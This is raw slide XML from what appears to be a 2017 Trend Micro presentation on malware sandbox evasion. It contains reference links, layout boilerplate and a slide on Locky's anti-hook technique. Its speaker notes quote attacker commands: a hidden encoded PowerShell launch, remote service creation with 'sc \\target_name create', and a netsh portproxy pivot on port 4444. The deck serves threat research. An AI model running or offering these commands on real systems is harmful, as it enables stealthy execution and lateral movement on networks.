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60" r:id="rId2"/>
    <p:sldId id="357" r:id="rId3"/>
    <p:sldId id="325" r:id="rId4"/>
    <p:sldId id="287" r:id="rId5"/>
    <p:sldId id="270" r:id="rId6"/>
    <p:sldId id="313" r:id="rId7"/>
    <p:sldId id="323" r:id="rId8"/>
    <p:sldId id="336" r:id="rId9"/>
    <p:sldId id="335" r:id="rId10"/>
    <p:sldId id="333" r:id="rId11"/>
    <p:sldId id="334" r:id="rId12"/>
    <p:sldId id="331" r:id="rId13"/>
    <p:sldId id="332" r:id="rId14"/>
    <p:sldId id="337" r:id="rId15"/>
    <p:sldId id="339" r:id="rId16"/>
    <p:sldId id="344" r:id="rId17"/>
    <p:sldId id="322" r:id="rId18"/>
    <p:sldId id="268" r:id="rId19"/>
    <p:sldId id="346" r:id="rId20"/>
    <p:sldId id="350" r:id="rId21"/>
    <p:sldId id="258" r:id="rId22"/>
    <p:sldId id="353" r:id="rId23"/>
    <p:sldId id="354" r:id="rId24"/>
    <p:sldId id="355" r:id="rId25"/>
    <p:sldId id="356" r:id="rId26"/>
    <p:sldId id="349" r:id="rId27"/>
    <p:sldId id="316" r:id="rId28"/>
    <p:sldId id="330" r:id="rId29"/>
    <p:sldId id="329" r:id="rId30"/>
    <p:sldId id="288" r:id="rId31"/>
    <p:sldId id="289" r:id="rId32"/>
    <p:sldId id="290" r:id="rId33"/>
    <p:sldId id="291" r:id="rId34"/>
    <p:sldId id="292" r:id="rId35"/>
    <p:sldId id="340" r:id="rId36"/>
    <p:sldId id="341" r:id="rId37"/>
    <p:sldId id="342" r:id="rId38"/>
    <p:sldId id="343" r:id="rId39"/>
    <p:sldId id="297" r:id="rId40"/>
    <p:sldId id="298" r:id="rId41"/>
    <p:sldId id="299" r:id="rId42"/>
    <p:sldId id="300" r:id="rId43"/>
    <p:sldId id="345" r:id="rId44"/>
    <p:sldId id="348" r:id="rId45"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9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63F"/>
    <a:srgbClr val="0086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50" autoAdjust="0"/>
    <p:restoredTop sz="88475" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="102" d="100"/>
          <a:sy n="102" d="100"/>
        </p:scale>
        <p:origin x="-102" y="1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562"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="89" d="100"/>
          <a:sy n="89" d="100"/>
        </p:scale>
        <p:origin x="-1554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01DE1F-37B5-4900-B44B-5B1B7616670E}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2017/7/5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48E095-4BB0-46AF-BA03-08CC31D394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9899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F69A9-9CC6-4B6E-8016-4F1C3D1B07EB}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2017/7/5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4B4942-4FA9-4E23-BBA2-A6D56F80DD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069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rdNoteworthy/al-khaser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github.com/AlicanAkyol/sems" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/joesecurity/pafishmacro" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/a0rtega/pafish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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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8960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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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59121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http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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9339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http://www.welivesecurity.com/2013/05/23/syndicasec-in-the-sin-bin/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http://la.trendmicro.com/media/misc/understanding-wmi-malware-research-paper-en.pdf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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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12477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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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9523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https://securelist.com/blog/research/77403/fileless-attacks-against-enterprise-networks/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http://www.freebuf.com/news/126686.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US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http://www.freebuf.com/news/126686.html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%COMSPEC% /b /c start /b /min powershell.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> -w hidden -e DHSFIQYUETRYUGHJASVDHKFGAHEFRIYQEGgeqqkjgKJGADSKJFGAKDSGFKASDKXXX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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> \\target_name create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ATITscUA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binpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>= “C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> -w hidden e aQBmACgAWwBJAG4AdABQAHQA…” start= manual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> interface </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>portproxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> add v4tov4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>listenport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=4444 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>connectaddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=10.10.1.12 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>connectport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=8080 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>listenaddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=0.0.0.0</a:t>
            </a:r>
          </a:p>
          <a:p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   </a:t>
            </a:r>
          </a:p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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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50472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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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5259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https://docs.google.com/spreadsheets/d/1x7kHyPqoJCiUQ1urfhk0yUQpcoPyYgpwuJ5s7p1TZEQ/edit#gid=83568603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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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7962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http://mp.weixin.qq.com/s/gjIEgqqQq_5czufuuiqM-Q</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>https://myonlinesecurity.co.uk/exxonmobile-introduction-letter-malspam-with-macro-enabled-microsoft-publisher-files-distribute-malware/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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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55493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https://github.com/LordNoteworthy/al-khaser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https://github.com/a0rtega/pafish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https://github.com/joesecurity/pafishmacro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https://github.com/AlicanAkyol/sems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https://github.com/CheckPointSW/InviZzzible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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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62362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http://christian-rossow.de/publications/sandprint-raid2016.pdf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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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7817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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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43873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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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91914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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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35228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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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49892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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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35324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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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91713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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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59076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https://myonlinesecurity.co.uk/exxonmobile-introduction-letter-malspam-with-macro-enabled-microsoft-publisher-files-distribute-malware/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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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45125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https://onedrive.live.com/?authkey=%21ADev0bfQMNxv504&amp;cid=C96A3EEDCE316E4C&amp;id=C96A3EEDCE316E4C%21114&amp;parId=C96A3EEDCE316E4C%21109&amp;o=OneUp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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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83056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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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72229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https://twitter.com/JohnLaTwC/status/808502501955629057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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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991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http://mp.weixin.qq.com/s/gjIEgqqQq_5czufuuiqM-Q</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>https://myonlinesecurity.co.uk/exxonmobile-introduction-letter-malspam-with-macro-enabled-microsoft-publisher-files-distribute-malware/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Multiple Malicious Script Types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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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27237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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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01546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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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56618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https://wiki.jarvis.trendmicro.com/pages/viewpage.action?spaceKey=SCTS&amp;title=Evasion+Benchmark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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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22340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http://mp.weixin.qq.com/s/gjIEgqqQq_5czufuuiqM-Q</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>https://myonlinesecurity.co.uk/exxonmobile-introduction-letter-malspam-with-macro-enabled-microsoft-publisher-files-distribute-malware/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Multiple Malicious Script Types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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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5543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en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http://blog.trendmicro.com/trendlabs-security-intelligence/locky-ransomware-spreads-flash-windows-kernel-exploits/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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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5691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FED07EC9CDE2A7B1581F192644CFA03D680A6245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http://blog.trendmicro.com/trendlabs-security-intelligence/locky-ransomware-spreads-flash-windows-kernel-exploits/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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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3101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FED07EC9CDE2A7B1581F192644CFA03D680A6245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http://blog.trendmicro.com/trendlabs-security-intelligence/locky-ransomware-spreads-flash-windows-kernel-exploits/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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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0959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FED07EC9CDE2A7B1581F192644CFA03D680A6245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http://blog.trendmicro.com/trendlabs-security-intelligence/locky-ransomware-spreads-flash-windows-kernel-exploits/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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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1517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https://wiki.jarvis.trendmicro.com/pages/viewpage.action?pageId=77728008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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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97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https://securingtomorrow.mcafee.com/mcafee-labs/locky-ransomware-hides-under-multiple-obfuscated-layers-of-javascript/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C60DE80123131AC980F4E49DAD20A89D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B4942-4FA9-4E23-BBA2-A6D56F80DD5A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2058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481" y="0"/>
            <a:ext cx="9215993" cy="51435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323528" y="1419622"/>
            <a:ext cx="5426354" cy="983021"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800" b="1" i="0" spc="100" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50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Sandbox Evasion, emerging to noteworthy in 2016</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty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323528" y="2499742"/>
            <a:ext cx="3868039" cy="706041"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1" i="0" spc="100" baseline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Moony Li</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CDC Zero Day Team</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="D:\0設計檔\2015\0402Cyber_Threat_Summit\PPT\Cyber_Threat_Summit2015_PPT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261" y="-20538"/>
            <a:ext cx="1093227" cy="56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1439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435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79512" y="123478"/>
            <a:ext cx="6713905" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80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2336" y="915566"/>
            <a:ext cx="8366760" cy="3816424"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2000" baseline="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accent2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accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="14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altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xxxx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Script Evasion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Sxxxxl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Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Evasion Tool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xxxxx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Evasion Benchmark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xxxxx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Summary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xxxx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2"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0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>
          <a:xfrm>
            <a:off x="107504" y="4803998"/>
            <a:ext cx="561844" cy="248949"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{2C518CF9-F01B-4438-A7D4-0DE57AD11A1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28" name="Picture 4" descr="D:\0設計檔\2015\0402Cyber_Threat_Summit\PPT\Cyber_Threat_Summit2015_PPT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5" y="-20538"/>
            <a:ext cx="1093227" cy="56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483518"/>
            <a:ext cx="1584176" cy="11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264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435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79512" y="123478"/>
            <a:ext cx="6713905" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80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en-US" dirty="0" smtClean="0"/>
              <a:t>Evasion Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0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>
          <a:xfrm>
            <a:off x="107504" y="4803998"/>
            <a:ext cx="561844" cy="248949"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{2C518CF9-F01B-4438-A7D4-0DE57AD11A1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28" name="Picture 4" descr="D:\0設計檔\2015\0402Cyber_Threat_Summit\PPT\Cyber_Threat_Summit2015_PPT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5" y="-20538"/>
            <a:ext cx="1093227" cy="56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483518"/>
            <a:ext cx="1584176" cy="1135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36512" y="647334"/>
            <a:ext cx="9180512" cy="464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25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435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79512" y="123478"/>
            <a:ext cx="6713905" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80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en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit you title slide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2336" y="915566"/>
            <a:ext cx="8366760" cy="3816424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accent2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accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="14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  <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0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>
          <a:xfrm>
            <a:off x="107504" y="4803998"/>
            <a:ext cx="561844" cy="248949"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{2C518CF9-F01B-4438-A7D4-0DE57AD11A1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28" name="Picture 4" descr="D:\0設計檔\2015\0402Cyber_Threat_Summit\PPT\Cyber_Threat_Summit2015_PPT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5" y="-20538"/>
            <a:ext cx="1093227" cy="56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483518"/>
            <a:ext cx="1584176" cy="11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11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435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79512" y="123478"/>
            <a:ext cx="6713905" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80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en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit you title slide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2336" y="915566"/>
            <a:ext cx="8366760" cy="3816424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accent2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accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="14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  <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0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>
          <a:xfrm>
            <a:off x="107504" y="4803998"/>
            <a:ext cx="561844" cy="248949"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{2C518CF9-F01B-4438-A7D4-0DE57AD11A1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28" name="Picture 4" descr="D:\0設計檔\2015\0402Cyber_Threat_Summit\PPT\Cyber_Threat_Summit2015_PPT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5" y="-20538"/>
            <a:ext cx="1093227" cy="56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483518"/>
            <a:ext cx="1584176" cy="11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034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435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79512" y="123478"/>
            <a:ext cx="6713905" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80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en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit you title slide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2336" y="915566"/>
            <a:ext cx="8366760" cy="3816424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accent2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accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="14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  <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0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>
          <a:xfrm>
            <a:off x="107504" y="4803998"/>
            <a:ext cx="561844" cy="248949"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{2C518CF9-F01B-4438-A7D4-0DE57AD11A1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28" name="Picture 4" descr="D:\0設計檔\2015\0402Cyber_Threat_Summit\PPT\Cyber_Threat_Summit2015_PPT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5" y="-20538"/>
            <a:ext cx="1093227" cy="56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483518"/>
            <a:ext cx="1584176" cy="11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422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7470" cy="5148000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="595882" y="1635646"/>
            <a:ext cx="5009749" cy="1125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+mn-lt"/>
              </a:rPr>
              <a:t>Divider Subtitle Can Go Here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8" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="595882" y="987574"/>
            <a:ext cx="6224400" cy="57606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+mn-lt"/>
              </a:rPr>
              <a:t>Divider Slide</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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6" name="Picture 4" descr="D:\0設計檔\2015\0402Cyber_Threat_Summit\PPT\Cyber_Threat_Summit2015_PPT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3478"/>
            <a:ext cx="1093227" cy="56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2064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217024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971600" y="1275606"/>
            <a:ext cx="4933049" cy="893655"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr lang="en-US" dirty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7" name="Date Placeholder 20"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25381" y="4875722"/>
            <a:ext cx="747814" cy="248949"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{8033E463-0BE5-44BF-A71F-3784C9DDE813}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="D:\0設計檔\2015\0402Cyber_Threat_Summit\TM_logo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230515"/>
            <a:ext cx="1092771" cy="36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837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dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style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  <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Fifth level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DCB70F-DDD1-4456-B568-4D7C2B91974F}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2017/7/5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E1930-4288-48CB-AC41-637E273A7B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5200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3" r:id="rId4"/>
    <p:sldLayoutId id="2147483654" r:id="rId5"/>
    <p:sldLayoutId id="2147483655" r:id="rId6"/>
    <p:sldLayoutId id="2147483652" r:id="rId7"/>
    <p:sldLayoutId id="2147483651" r:id="rId8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%7byokoyama-akira-bs|ishii-kou-yf|tanabe-rui-nv%7d@ynu.jp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Sandbox evasion</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Emerging to noteworthy in 2016</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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/>
              <a:t>Moony Li</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>CDC Zero Day Team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806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13"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="18913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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Anti-Hook with Switch32to64		3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/4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en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>---TROJ_LOCKY.DLDRA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>Locky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2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In WoW64 (malware) program, change segment selector from 0x23(32bit Code) to 0x33 (64bit Code) by intention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>CPU mode check (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Switch32to64</a:t>
            </a:r>
            <a:r>
